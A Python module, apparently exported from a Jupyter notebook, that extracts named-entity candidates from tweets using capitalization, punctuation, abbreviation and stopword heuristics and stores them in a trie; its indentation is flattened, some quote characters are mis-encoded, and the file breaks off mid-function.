#string.punctuation.extend('โ','โ','โ')
#---------------------Existing Lists--------------------
# In[300]:
class SatadishaModule():
def __init__(self):
print("hello")
#self.batch=batch
#self.batch=self.batch[:3000:]
self.counter=0
#self.extract()
def flatten(self,mylist, outlist,ignore_types=(str, bytes, int, ne.NE_candidate)):
if mylist !=[]:
for item in mylist:
#print not isinstance(item, ne.NE_candidate)
if isinstance(item, list) and not isinstance(item, ignore_types):
self.flatten(item, outlist)
else:
if isinstance(item,ne.NE_candidate):
item.phraseText=item.phraseText.strip(' \t\n\r')
item.reset_length()
else:
if type(item)!= int:
item=item.strip(' \t\n\r')
outlist.append(item)
return outlist
def normalize(self,word):
strip_op=word
strip_op=(((strip_op.lstrip(string.punctuation)).rstrip(string.punctuation)).strip()).lower()
strip_op=(strip_op.lstrip('โโโโ')).rstrip('โโโโ')
#strip_op= self.rreplace(self.rreplace(self.rreplace(strip_op,"'s","",1),"โs","",1),"โs","",1)
if strip_op.endswith("'s"):
li = strip_op.rsplit("'s", 1)
return ''.join(li)
elif strip_op.endswith("โs"):
li = strip_op.rsplit("โs", 1)
return ''.join(li)
else:
return strip_op
#@profile
def extract(self,batch,batch_number):
#df = read_csv('eric_trump.csv', index_col='ID', header=0, encoding='utf-8')
print("Phase I extracting now")
time_in=time.time()
self.batch=batch
#output.csv
#df_out= DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'usertype', 'TweetSentence', 'phase1Candidates'))
self.df_out= pd.DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'TweetSentence', 'phase1Candidates','start_time','entry_batch','annotation'))
if(self.counter==0):
#self.df_out= pd.DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'TweetSentence', 'phase1Candidates','correct_candidates_tweet'))
#dict1 = {'tweetID':0, 'sentID':0, 'hashtags':'first', 'user':'user', 'TweetSentence':'sentence', 'phase1Candidates':'phase1Out','start_time':'now','entry_batch':'batch_number'}
self.CTrie=trie.Trie("ROOT")
self.ME_EXTR=Mention.Mention_Extraction()
#self.df_out= pd.DataFrame({'tweetID':0, 'sentID':0, 'hashtags':'first', 'user':'user', 'TweetSentence':'sentence', 'phase1Candidates':'phase1Out','start_time':'now','entry_batch':'batch_number'}, index=[0,])
#%%timeit -o
#module_capital_punct.main:
'''I am running this for 100 iterations for testing purposes. Of course you no longer need this for loop as you are
#running one tuple at a time'''
#if(self.counter==0):
#initializing candidateBase with a dummy node
#self.interCWSGap={}
#candidateBase={}
#NE_container=DataFrame(columns=('candidate', 'frequency', 'capitalized', 'start_of_sentence', 'abbreviation', 'all_capitalized','is_csl','title','has_number','date_indicator','is_apostrophed','has_intermediate_punctuation','ends_like_verb','ends_like_adverb','change_in_capitalization','has_topic_indicator'))
count=0
ne_count=0
userMention_count=0
#token_count=0
NE_list_phase1=[]
UserMention_list=[]
df_holder=[]
#--------------------------------------PHASE I---------------------------------------------------
for index, row in self.batch.iterrows():
now = datetime.datetime.now()
#now=str(now.hour)+":"+str(now.minute)+":"+str(now.second)
#hashtags=str(row['Discussion'])
hashtags=str(row['HashTags'])
user=str(row['User'])
#userType=str(row['User Type'])
tweetText=str(row['TweetText'])
#correct_candidates_tweet=str(row['Mentions'])
#print(str(index))
annot_raw=str(row['mentions_other'])
split_list=annot_raw.split(";")
#split_listFilter=list(filter(lambda element: element.strip()!='', split_list))
split_listFilter=list(filter(None, split_list))
#annotations in list of list structure
filtered_2_times=list(map(lambda element: list(filter(None, element.split(','))), split_list))
#capitalization module
#if all words are capitalized:
# print(index)
# print(filtered_2_times)
# if(len(filtered_2_times)==0):
# filtered_2_times=[[]]
if tweetText.isupper():
dict1 = {'tweetID':str(index), 'sentID':str(0), 'hashtags':hashtags, 'user':user, 'TweetSentence':tweetText, 'phase1Candidates':"nan",'start_time':now,'entry_batch':batch_number,'annotation':filtered_2_times[0]}
df_holder.append(dict1)
elif tweetText.islower():
print("",end="")
dict1 = {'tweetID':str(index), 'sentID':str(0), 'hashtags':hashtags, 'user':user, 'TweetSentence':tweetText, 'phase1Candidates':"nan",'start_time':now,'entry_batch':batch_number,'annotation':filtered_2_times[0]}
df_holder.append(dict1)
else:
ne_List_final=[]
userMention_List_final=[]
#pre-modification: returns word list split at whitespaces; retains punctuation
tweetSentences=list(filter (lambda sentence: len(sentence)>1, tweetText.split('\n')))
tweetSentenceList_inter=self.flatten(list(map(lambda sentText: sent_tokenize(sentText.lstrip().rstrip()),tweetSentences)),[])
tweetSentenceList=list(filter (lambda sentence: len(sentence)>1, tweetSentenceList_inter))
for sen_index in range(len(tweetSentenceList)):
sentence=tweetSentenceList[sen_index]
modified_annotations=[self.normalize(candidate)for candidate in filtered_2_times[sen_index]]
annotation=[]
for candidate in modified_annotations:
if(candidate=="nan"):
pass
else:
annotation.append(candidate)
# for i in filtered_2_times[sen_index]:
# if(i=="nan"):
#print(sentence)
#print(sen_index)
#tweetWordList= list(filter(lambda word:(word.strip(string.punctuation))!="",sentence.split()))
tempList=[]
tempWordList=sentence.split()
#print(tempWordList)
for word in tempWordList:
temp=[]
if "..." in word:
#print("here")
temp=list(filter(lambda elem: elem!='',word.split("...")))
# if(temp1):
# temp=list(map(lambda elem: elem+'...', temp1[:-1]))
# temp.append(temp1[-1])
elif ".." in word:
temp=list(filter(lambda elem: elem!='',word.split("..")))
# if(temp1):
# temp=list(map(lambda elem: elem+'..', temp1[:-1]))
# temp.append(temp1[-1])
elif (("?" in word)&(not word.endswith("?"))):
temp1=list(filter(lambda elem: elem!='',word.split("?")))
if(temp1):
temp=list(map(lambda elem: elem+'?', temp1[:-1]))
temp.append(temp1[-1])
elif ((":" in word)&(not word.endswith(":"))):
temp1=list(filter(lambda elem: elem!='',word.split(":")))
if(temp1):
temp=list(map(lambda elem: elem+':', temp1[:-1]))
temp.append(temp1[-1])
elif (("," in word)&(not word.endswith(","))):
#temp=list(filter(lambda elem: elem!='',word.split(",")))
temp1=list(filter(lambda elem: elem!='',word.split(",")))
if(temp1):
temp=list(map(lambda elem: elem+',', temp1[:-1]))
temp.append(temp1[-1])
elif (("/" in word)&(not word.endswith("/"))):
temp1=list(filter(lambda elem: elem!='',word.split("/")))
if(temp1):
temp=list(map(lambda elem: elem+'/', temp1[:-1]))
temp.append(temp1[-1])
#print(index, temp)
else:
#if word not in string.punctuation:
temp=[word]
if(temp):
tempList.append(temp)
tweetWordList=self.flatten(tempList,[])
#print(tweetWordList)
#token_count+=len(tweetWordList)
#returns position of words that are capitalized
#print(tweetWordList)
tweetWordList_cappos = list(map(lambda element : element[0], filter(lambda element : self.capCheck(element[1]), enumerate(tweetWordList))))
#print(tweetWordList_cappos)
#returns list of stopwords in tweet sentence
combined_list_here=([]+cachedStopWords+article_list+prep_list+chat_word_list)
#combined_list_here.remove("the")
tweetWordList_stopWords=list(filter(lambda word: ((word[0].islower()) & (((word.strip()).strip(string.punctuation)).lower() in combined_list_here))|(word.strip() in string.punctuation)|(word.startswith('@')), tweetWordList))
#returns list of @userMentions
userMentionswPunct=list(filter(lambda phrase: phrase.startswith('@'), tweetWordList))
userMentions=list(map(lambda mention: mention.rstrip(string.punctuation), userMentionswPunct))
userMention_count+=len(userMentions)
userMention_List_final+=userMentions
'''#function to process and store @ user mentions---- thread 1
#print(userMention_List_final)
threading.Thread(target=self.ME_EXTR.ComputeAll, args=(userMention_List_final,)).start()'''
#non @usermentions are processed in this function to find non @, non hashtag Entities---- thread 2
ne_List_allCheck=[]
#if(len(tweetWordList)>len(tweetWordList_cappos)):
#print(len(tweetWordList),str(len(tweetWordList_cappos)),str(len(tweetWordList_stopWords)))
if((len(tweetWordList))>(len(tweetWordList_cappos))):
#q = queue.Queue()
#threading.Thread(target=self.trueEntity_process, args=(tweetWordList_cappos,tweetWordList,q)).start()
ne_List_allCheck= self.trueEntity_process(tweetWordList_cappos,tweetWordList)
#ne_List_allCheck= q.get()
ne_count+=len(ne_List_allCheck)
ne_List_final+=ne_List_allCheck
#write row to output dataframe
phase1Out=""
if(len(tweetWordList)==len(tweetWordList_cappos)):
phase1Out="nan"
if(len(ne_List_allCheck)>0):
for candidate in ne_List_allCheck:
position = '*'+'*'.join(str(v) for v in candidate.position)
position=position+'*'
candidate.set_sen_index(sen_index)
phase1Out+=(((candidate.phraseText).lstrip(string.punctuation)).strip())+ '::'+str(position)+"||"
#print(self.df_out.columns)
dict1 = {'tweetID':str(index), 'sentID':str(sen_index), 'hashtags':hashtags, 'user':user, 'TweetSentence':sentence, 'phase1Candidates':phase1Out,'start_time':now,'entry_batch':batch_number,'annotation':annotation}
df_holder.append(dict1)
#self.df_out.append(outrow)
#self.df_out=self.df_out.append(outrow,ignore_index=True)
for candidate in ne_List_final:
#self.insert_dict (candidate,self.NE_container,candidateBase,index,candidate.sen_index,batch_number)
candidateText=(((candidate.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip(' \t\n\r')).lower()
candidateText=(candidateText.lstrip('โโโโ')).rstrip('โโโโ')
candidateText= self.rreplace(self.rreplace(self.rreplace(candidateText,"'s","",1),"โs","",1),"โs","",1)
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
if not ((candidateText in combined)|(candidateText.isdigit())|(self.is_float(candidateText))):
self.CTrie.__setitem__(candidateText.split(),len(candidateText.split()),candidate.features,batch_number)
#self.printList(ne_List_final)
#if(userMention_List_final):
# print(userMention_List_final)
NE_list_phase1+=ne_List_final
UserMention_list+=userMention_List_final
#print ("\n")
#fieldnames=['candidate','freq','length','cap','start_of_sen','abbrv','all_cap','is_csl','title','has_no','date','is_apostrp','has_inter_punct','ends_verb','ends_adverb','change_in_cap','topic_ind','entry_time','entry_batch','@mention']
#updated_NE_container=[]
'''#Updating trie with @mention info
self.CTrie.updateTrie("",self.ME_EXTR)'''
time_out=time.time()
#for display purposes Iterating through the trie
'''candidateBase= self.CTrie.__iter__()
for node in candidateBase:
print(node)'''
'''for key in self.NE_container.keys():
val=self.NE_container[key]+[str(ME_EXTR.checkInDictionary(key))]
#index+=1
#updated_NE_container[key]=val
dict1 = {'candidate':key, 'freq':val[0],'length':val[1],'cap':val[2],'start_of_sen':val[3],'abbrv':val[4],'all_cap':val[5],'is_csl':val[6],'title':val[7],'has_no':val[8],'date':val[9],'is_apostrp':val[10],'has_inter_punct':val[11],'ends_verb':val[12],'ends_adverb':val[13],'change_in_cap':val[14],'topic_ind':val[15],'entry_time':val[16],'entry_batch':val[17],'@mention':val[18]}
updated_NE_container.append(dict1)'''
'''with open('candidate_base.csv', 'w') as output_candidate:
#with open('candidates.csv', 'w') as output_candidate:
writer = csv.writer(output_candidate)
writer.writerow(fieldnames)
for k, v in updated_NE_container.items():
writer.writerow([k] + v)'''
#print("Total number of tokens processed: "+str(token_count))
#print ("Total number of candidate NEs extracted: "+str(len(candidateBase)))
#print(self.NE_container.items())
#freqs=pd.read_csv('candidate_base.csv', encoding = 'utf-8',delimiter=',')
#freqs = pd.DataFrame(updated_NE_container, columns=fieldnames)
#freqs = pd.DataFrame()
#freqs=pd.DataFrame(list(self.NE_container.items()), orient='index')#columns=fieldnames)
self.append_rows(df_holder)
self.counter=self.counter+1
#return (copy.deepcopy(self.df_out),copy.deepcopy(freqs),time_in,time_out)
return (self.df_out,self.CTrie,time_in,time_out)
#return sorted_candidateBase
#@profile
def append_rows(self,df_holder):
df = pd.DataFrame(df_holder)
self.df_out=self.df_out.append(df)
self.df_out.to_csv('tweet_base.csv' ,sep=',', encoding='utf-8')
def rreplace(self,s, old, new, occurrence):
if s.endswith(old):
li = s.rsplit(old, occurrence)
return new.join(li)
else:
return s
def stopwordReplace(self, candidate):
if(candidate.features[ne.is_quoted]):
return candidate
combined=cachedStopWords+prep_list+article_list+day_list+chat_word_list
wordlist=list(filter(lambda word: word!='', candidate.phraseText.split()))
pos=candidate.position
#print(candidate.phraseText,wordlist,pos)
start=0
flag=False
while(start!=len(pos)):
if(wordlist[start].lstrip(string.punctuation).rstrip(string.punctuation).strip().lower() not in combined):
#flag=True
break
start+=1
end=len(pos)-1
while(end>=0):
#print(wordlist[end])
if(wordlist[end].lstrip(string.punctuation).rstrip(string.punctuation).strip() not in combined):
#flag=True
break
end-=1
#print(start,end)
updated_pos=pos[start:(end+1)]
updated_phrase=' '.join(wordlist[start:(end+1)])
#print(updated_pos,updated_phrase)
candidate.phraseText=updated_phrase
candidate.position=updated_pos
return candidate
# In[301]:
#candidate: 'frequency','length', 'capitalized', 'start_of_sentence', 'abbreviation', 'all_capitalized','is_csl','title','has_number','date_indicator','is_apostrophed','has_intermediate_punctuation','ends_like_verb','ends_like_adverb','change_in_capitalization','has_topic_indicator'
def is_float(self,string):
try:
f=float(string)
if(f==0.0):
return True
else:
return ((f) and (string.count(".")==1))
#return True# True if string is a number with a dot
except ValueError: # if string is not a number
return False
def insert_dict(self,candidate,NE_container,candidateBase,tweetID,sentenceID,batch):
key=(((candidate.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip(' \t\n\r')).lower()
key=(key.lstrip('โโโโ')).rstrip('โโโโ')
key= self.rreplace(self.rreplace(self.rreplace(key,"'s","",1),"โs","",1),"โs","",1)
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
try:
if ((key in combined)|(key.isdigit())|(self.is_float(key))):
return
except TypeError:
print(key)
tweetID=str(tweetID)
sentenceID=str(sentenceID)
if key in self.NE_container:
feature_list=self.NE_container[key]
feature_list[0]+=1
for index in [0,1,2,3,4,5,6,7,9,10,11,13,14]:
if (candidate.features[index]==True):
feature_list[index+2]+=1
for index in [8,12]:
if (candidate.features[index]!=-1):
feature_list[index+2]+=1
else:
now = datetime.datetime.now()
now=str(now.hour)+":"+str(now.minute)+":"+str(now.second)
feature_list=[0]*17
feature_list[0]+=1
feature_list[1]=candidate.length
#call background process to check for non capitalized occurences
for index in [0,1,2,3,4,5,6,7,9,10,11,13,14]:
if (candidate.features[index]==True):
feature_list[index+2]+=1
for index in [8,12]:
if (candidate.features[index]!=-1):
feature_list[index+2]+=1
feature_list.append(now)
feature_list.append(batch)
self.NE_container[key] = feature_list
#insert in candidateBase
'''if key in candidateBase.keys():
#candidateBase[key]=candidateBase[key]+[str(tweetID)+":"+str(sentenceID)]
if(tweetID in candidateBase[key]):
if(sentenceID in candidateBase[key][tweetID] ):
candidateBase[key][tweetID][sentenceID]=candidateBase[key][tweetID][sentenceID]+1
else:
candidateBase[key][tweetID][sentenceID]=1
else:
candidateBase[key][tweetID]={}
candidateBase[key][tweetID][sentenceID]=1
#c=[(y,str(idx)) for idx,y in enumerate( a) if y not in b]
#candidateBase[key]
else:
#candidateBase[key]=[str(tweetID)+":"+str(sentenceID)]
candidateBase[key]={}
candidateBase[key][tweetID]={}
candidateBase[key][tweetID][sentenceID]=1'''
return
# In[302]:
def printList(self,mylist):
print("["),
#print "[",
for item in mylist:
if item != None:
if isinstance(item,ne.NE_candidate):
item.print_obj()
#print (item.phraseText)
else:
print (item+",", end="")
#print item+",",
#print "]"
print("]")
return
# In[303]:
# In[304]:
def consecutive_cap(self,tweetWordList_cappos,tweetWordList):
output=[]
#identifies consecutive numbers in the sequence
#print(tweetWordList_cappos)
for k, g in groupby(enumerate(tweetWordList_cappos), lambda element: element[0]-element[1]):
output.append(list(map(itemgetter(1), g)))
count=0
if output:
final_output=[output[0]]
for first, second in (zip(output,output[1:])):
#print(first,second)
#print(tweetWordList[first[-1]])
if ((not (tweetWordList[first[-1]]).endswith('"'))&((second[0]-first[-1])==2) & (tweetWordList[first[-1]+1].lower() in prep_list)):
(final_output[-1]).extend([first[-1]+1]+second)
elif((not (tweetWordList[first[-1]].endswith('"')))&((second[0]-first[-1])==3) & (tweetWordList[first[-1]+1].lower() in prep_list)& (tweetWordList[first[-1]+2].lower() in article_list)):
(final_output[-1]).extend([first[-1]+1]+[first[-1]+2]+second)
else:
final_output.append(second)
#merge_positions.append(False)
else:
final_output=[]
return final_output
# In[305]:
#basically splitting the original NE_candidate text and building individual object from each text snippet
def build_custom_NE(self,phrase,pos,prototype,feature_index,feature_value):
#print("Enters")
position=pos
custom_NE= ne.NE_candidate(phrase,position)
for i in range(15):
custom_NE.set_feature(i,prototype.features[i])
custom_NE.set_feature(feature_index,feature_value)
if (feature_index== ne.is_csl) & (feature_value== True):
custom_NE.set_feature(ne.start_of_sentence, False)
custom_NE=self.entity_info_check(custom_NE)
return custom_NE
# In[306]:
def abbrv_algo(self,ne_element):
'''abbreviation algorithm
trailing apostrophe:
|period:
| multiple letter-period sequence:
| all caps
| non period:
| ?/! else drop apostrophe
else:
unchanged
'''
phrase= ne_element.phraseText
#print("=>"+phrase)
#since no further split occurs we can set remaining features now
ne_element.set_feature(ne.capitalized, True)
if ne_element.phraseText.isupper():
ne_element.set_feature(ne.all_capitalized, True)
else:
ne_element.set_feature(ne.all_capitalized, False)
abbreviation_flag=False
p=re.compile(r'[^a-zA-Z\d\s]$')
match_list = p.findall(phrase)
if len(match_list)>0:
#print("Here")
if phrase.endswith('.'):
#print("Here")
p1= re.compile(r'([a-zA-Z][\.]\s*)')
match_list = p1.findall(phrase)
if ((len(match_list)>1) & (len(phrase)<6)):
#print ("1. Found abbreviation: "+phrase)
abbreviation_flag= True
else:
if (phrase[-2]!=' '):
phrase= phrase[:-1]
else:
#if phrase.endswith(string.punctuation):
if (phrase[-2]!=' '):
phrase= phrase[:-1]
#if not (phrase.endswith('?')|phrase.endswith('!')|phrase.endswith(')')|phrase.endswith('>')):
#phrase= phrase[:-1]
else:
p2=re.compile(r'([^a-zA-Z0-9_\s])')
match_list = p2.findall(phrase)
if ((len(match_list)==0) & (phrase.isupper()) & (len(phrase)<7)& (len(phrase)>1)):
#print ("2. Found abbreviation!!: "+phrase)
abbreviation_flag= True
else:
#print("Here-> "+phrase)
p3= re.compile(r'([A-Z][.][A-Z])')
p4= re.compile(r'\s')
match_list = p3.findall(phrase)
match_list1 = p4.findall(phrase)
if ((len(match_list)>0) & (len(match_list1)==0)):
abbreviation_flag= True
#print ("3. Found abbreviation!!: "+phrase)
#element= ne.NE_candidate(phrase.strip())
ne_element.phraseText=phrase
ne_element.reset_length()
ne_element.set_feature(ne.abbreviation, abbreviation_flag)
return ne_element
# In[307]:
def punct_clause(self,NE_phrase_in):
NE_phrases=self.entity_info_check(NE_phrase_in)
cap_phrases=NE_phrases.phraseText.strip()
final_lst=[]
#print (cap_phrases,NE_phrases.features[ne.date_indicator])
if (re.compile(r'[^a-zA-Z0-9_\s]')).findall(cap_phrases):
#case of intermediate punctuations: handles abbreviations
p1= re.compile(r'(?:[a-zA-Z0-9][^a-zA-Z0-9_\s]\s*)')
match_lst = p1.findall(cap_phrases)
#print(match_lst)
if match_lst:
index= (list( p1.finditer(cap_phrases) )[-1]).span()[1]
p= re.compile(r'[^a-zA-Z\d\s]')
match_list = p.findall(cap_phrases)
p2=re.compile(r'[^a-zA-Z\d\s]$') #ends with punctuation
if ((len(match_list)>0)&(len(match_lst)>0)&((len(match_list)-len(match_lst))>0)):
if (p2.findall(cap_phrases)):
#only strips trailing punctuations, not intermediate ones following letters
cap_phrases = cap_phrases[0:index]+re.sub(p, '', cap_phrases[index:])
NE_phrases.phraseText= cap_phrases
#comma separated NEs
#lst=filter(lambda(word): word!="", re.split('[,]', cap_phrases))
#print ("=>"+ cap_phrases)
start_of_sentence_fix=NE_phrases.features[ne.start_of_sentence]
#temp=re.split("\...", cap_phrases)
#inter=self.flatten(list(map(lambda elem: re.split('[,:!โฆ]',elem),temp)),[])
#print("'''",inter)
combined=cachedStopWords+prep_list+article_list+day_list+chat_word_list
splitList=re.split('["โโโโ()/,;:!?โฆ]',cap_phrases)
splitList=list(filter(lambda word: ((word!="")&(word.lstrip(string.punctuation).rstrip(string.punctuation).strip().lower() not in combined)), splitList))
#print("==",splitList)
wordlstU=list(map(lambda word: word.strip().strip(string.punctuation), splitList))
wordlstU=list(filter(lambda word: word!="", wordlstU))
wordlst=list(filter(lambda word: ((word.strip().strip(string.punctuation))[0].isupper()|(word.strip().strip(string.punctuation))[0].isdigit()), wordlstU))
#print(":::",wordlst)
if ((NE_phrases.features[ne.date_indicator]==False)):
#print("hehe")
if(len(splitList)>1):
if(len(wordlst)>0):
#print("here::")
pos=NE_phrases.position
combined=[]
prev=0
for i in range(len(wordlst)):
word=wordlst[i]
word_len=len(list(filter(lambda individual_word: individual_word!="", re.split('[ ]', word))))
word_pos=pos[(prev):(prev+word_len)]
prev=prev+word_len
combined+=[[word]+word_pos]
lst_nsw=list(filter(lambda element: (((str(element[0])).strip(string.punctuation).lower() not in combined)& (not (str(element[0])).strip(string.punctuation).isdigit()) & (len(str(element[0]))>1)) ,combined))
#print ("++",lst_nsw)
if(lst_nsw):
final_lst= list(map(lambda element:self.build_custom_NE(str(element[0]),element[1:],NE_phrases,ne.is_csl,True), lst_nsw))
final_lst[0].set_feature(ne.start_of_sentence, NE_phrases.features[ne.start_of_sentence])
else:
final_lst=[]
else:
NE_phrases.set_feature(ne.is_csl,False)
final_lst=[NE_phrases]
else:
NE_phrases.set_feature(ne.is_csl,False)
final_lst=[NE_phrases]
#check abbreviation
#print("++",final_lst)
if(final_lst):
final_lst= list(map(lambda phrase: self.abbrv_algo(phrase), final_lst))
#print(lst)
return final_lst
# In[308]:
#%%timeit -o
def f(self,y,sflag,quoteFlag,tweetWordList):
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
#print(sflag)
if sflag:
left=""
right=""
lp=(-1)
rp=(-1)
i=0
j=len(y)-1
flag1=False
flag2=False
x=[]
while (((flag1==False)|(flag2==False))&((j-i)>0)):
if(flag1==False):
left=(((tweetWordList[y[i]].strip('โโ"โโ')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(left not in combined):
flag1=True
lp=i
else:
i+=1
if(flag2==False):
right=(((tweetWordList[y[j]].strip('โโ"โโ')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(right not in combined):
flag2=True
rp=j
else:
j-=1
#print(flag1,flag2)
#if((flag1==False)|(flag2==False)):
# while (((j-i)!=0)|((flag1==False)|(flag2==False))):
if(flag1==False):
left=(((tweetWordList[y[i]].strip('โโ"โโ')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
#print(left)
if(left not in combined):
flag1=True
lp=i
else:
i+=1
if(flag2==False):
right=(((tweetWordList[y[j]].strip('โโ"โโ')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(right not in combined):
flag2=True
rp=j
else:
j-=1
#print(lp,rp)
if(lp==rp):
if(lp!=-1):
x=[y[lp]]
else:
x=y[lp:(rp+1)]
else:
x=y
#print(x)
if(x):
list1=list(map(lambda word: tweetWordList[word], x))
phrase=" ".join(e for e in list1)
#print(phrase)
phrase1="".join(list1)
#if not ((phrase[0].isdigit()) & (len(x)==1)):
if not (phrase1.strip().isdigit()):
NE_phrase= ne.NE_candidate(phrase.strip(),x)
if 0 in x:
NE_phrase.set_feature(ne.start_of_sentence,True)
else:
NE_phrase.set_feature(ne.start_of_sentence,False)
NE_phrase.set_feature(ne.is_quoted,quoteFlag)
else:
NE_phrase= ne.NE_candidate("JUST_DIGIT_ERROR",[])
else:
NE_phrase= ne.NE_candidate("JUST_DIGIT_ERROR",[])
#print("====>>",NE_phrase.phraseText)
return NE_phrase
# In[309]:
def capCheck(self,word):
combined_list=[]+cachedStopWords+prep_list+chat_word_list+article_list
if word.startswith('@'):
return False
elif "<Hashtag" in word:
return False
#elif (((word.strip('โโโโ')).lstrip(string.punctuation)).rstrip(string.punctuation)).lower() in combined_list:
elif (((word.strip('โโโโ')).lstrip(string.punctuation)).rstrip(string.punctuation)) in combined_list:
# if((word=="The")|(word=="THE")):
# return True
# else:
return True
elif word[0].isdigit():
return True
else:
p=re.compile(r'^[\W]*[A-Z]')
l= p.match(word)
if l:
return True
else:
return False
# In[310]:
def title_check(self,ne_phrase):
title_flag=False
words=ne_phrase.phraseText.split()
for word in words:
if word.lower() in cachedTitles:
title_flag= True
break
ne_phrase.set_feature(ne.title,title_flag)
return ne_phrase
# In[311]:
def entity_info_check(self,ne_phrase):
flag1=False #has number
flag3=False
flag_ind=[] #is number
month_ind=[]
date_num_holder=[]
words=ne_phrase.phraseText.split()
for word in words:
word=(word.strip()).rstrip(string.punctuation).lower()
punct_flag=False
for char in word:
if ((char in string.punctuation)|(char in ['โ','โ','โ','โ','โฆ'])):
punct_flag=True
break
#if ((not word.isalpha())& (not "'s" in word) & (not "โs" in word)):'โโ"โโ
if ((not word.isalpha())& (not punct_flag)):
flag_ind+=[True]
if word.isdigit():
date_num_holder+=['num']
else:
date_num_holder+=['alpha']
else:
flag_ind+=[False]
if word in month_list:
month_ind+=[True]
date_num_holder+=['month']
elif word in day_list:
date_num_holder+=['day']
elif word in prep_list:
date_num_holder+=['preposition']
elif word in article_list:
date_num_holder+=['article']
else:
#print("=>"+word)
date_num_holder+=['string']
if True in flag_ind:
flag1=True
if True in month_ind:
flag3=True
ne_phrase.set_feature(ne.has_number,flag1)
ne_phrase.set_feature(ne.date_indicator,flag3)
ne_phrase.set_date_num_holder(date_num_holder)
return ne_phrase
# In[312]:
#removing commonly used expletives, enunciated chat words and other common words (like days of the week, common expressions)
def slang_remove(self,ne_phrase):
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
p1= re.compile(r'([A-Za-z]+)\1\1{1,}')
match_lst = p1.findall(phrase)
if phrase in article_list:
return True
elif phrase in day_list:
return True
#elif phrase in month_list:
#return True
elif match_lst:
return True
else:
return False
# In[313]:
def apostrope_check(self,ne_phrase):
apostrophe="'s"
bad_apostrophe="โs"
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
if (apostrophe in phrase):
if (phrase.endswith(apostrophe)):
ne_phrase.set_feature(ne.is_apostrophed,0)
else:
#print(phrase.find(apostrophe))
ne_phrase.set_feature(ne.is_apostrophed,phrase.find(apostrophe))
elif (bad_apostrophe in phrase):
if phrase.endswith(bad_apostrophe):
ne_phrase.set_feature(ne.is_apostrophed,0)
else:
#print(phrase.find(apostrophe))
ne_phrase.set_feature(ne.is_apostrophed,phrase.find(bad_apostrophe))
else:
ne_phrase.set_feature(ne.is_apostrophed,-1)
return ne_phrase
# In[314]:
def punctuation_check(self,ne_phrase):
holder=[]
punctuation_holder=[]
flag_holder=[]
phrase=(ne_phrase.phraseText.strip()).rstrip(string.punctuation).lower()
for i in range(len(phrase)):
if (phrase[i] in string.punctuation):
holder+=[i]
for i in holder:
if ((i<(len(phrase)-1)) & (phrase[i]=="'") & (phrase[i+1]=="s")):
flag_holder+=[False]
elif ((i==(len(phrase)-1)) & (phrase[i]=="'")):
flag_holder+=[False]
else:
flag_holder+=[True]
punctuation_holder+=[i]
#print(flag_holder)
ne_phrase.set_punctuation_holder(punctuation_holder)
if True in flag_holder:
ne_phrase.set_feature(ne.has_intermediate_punctuation,True)
else:
ne_phrase.set_feature(ne.has_intermediate_punctuation,False)
return ne_phrase
# In[315]:
def tense_check(self,ne_phrase):
words=(((ne_phrase.phraseText.strip()).rstrip(string.punctuation)).lower()).split()
verb_flag=False
adverb_flag=False
if (len(words)==1):
if words[0].endswith("ing"):
verb_flag=True
if words[0].endswith("ly"):
adverb_flag=True
ne_phrase.set_feature(ne.ends_like_verb,verb_flag)
ne_phrase.set_feature(ne.ends_like_adverb,adverb_flag)
return ne_phrase
# In[316]:
def capitalization_change(self,ne_element):
phrase=((ne_element.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip()
val=-1
topic_indicator=False
p1= re.compile(r'[A-Z]*\s*[A-Z]{4,}[^A-Za-z]*\s+[A-Za-z]+') #BREAKING: Toronto Raptors
p2= re.compile(r'([A-Z]{1}[a-z]+)+[^A-Za-z]*\s+[A-Z]{4,}') #The DREAMIEST LAND
match_lst1 = p1.findall(phrase)
match_lst2 = p2.findall(phrase)
if (match_lst1):
if not phrase.isupper():
p3=re.compile(r'[A-Z]*\s*[A-Z]{4,}[^A-Za-z]*\s+')
val=list(p3.finditer(phrase))[-1].span()[1]
if(":" in phrase):
topic_indicator=True
ne_element.set_feature(ne.change_in_capitalization,val)
elif (match_lst2):
#print ("GOTIT2: "+phrase)
p3=re.compile(r'([A-Z]{1}[a-z]+)+')
val=list(p3.finditer(phrase))[-1].span()[1]
ne_element.set_feature(ne.change_in_capitalization,val)
else:
ne_element.set_feature(ne.change_in_capitalization,val)
ne_element.set_feature(ne.has_topic_indicator,topic_indicator)
return ne_element
def quoteProcess(self,unitQuoted, tweetWordList):
candidateString=""
retList=[]
matches=[]
quoteMatch=[]
final=[]
flag=False
#print(tweetWordList)
list1=list(map(lambda index: tweetWordList[index], unitQuoted))
candidateString=" ".join(list1)
#print("=>",candidateString)
# candidateString=""
# for index in range(len(unitQuoted)-1):
# candidateString+=tweetWordList[unitQuoted[index]]+" "
# candidateString+=tweetWordList[unitQuoted[-1]]
# print("=>",candidateString)
flagOne=False
flagTwo=False
flagThree=False
flagFour=False
p= re.compile(r'[^\S]*([\'].*?[\'])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([\'].*?[\'])[^\s]*')
p2=re.compile(r'[^\s]*([\'].*?[\'])[^\s]+')
indices= (list(p.finditer(candidateString)))
indices1= (list(p1.finditer(candidateString)))
indices2= (list(p2.finditer(candidateString)))
if((len(indices)>0) & (len(indices1)==0)& (len(indices2)==0)):
flagOne=True
if(not flagOne):
p= re.compile(r'[^\S]*([โ].*?[โ])[^a-zA-Z0-9\s]*[\s]*')
p1=re.compile(r'[^\s]+([โ].*?[โ])[^\s]*')
p2=re.compile(r'[^\s]*([โ].*?[โ])[^\s]+')
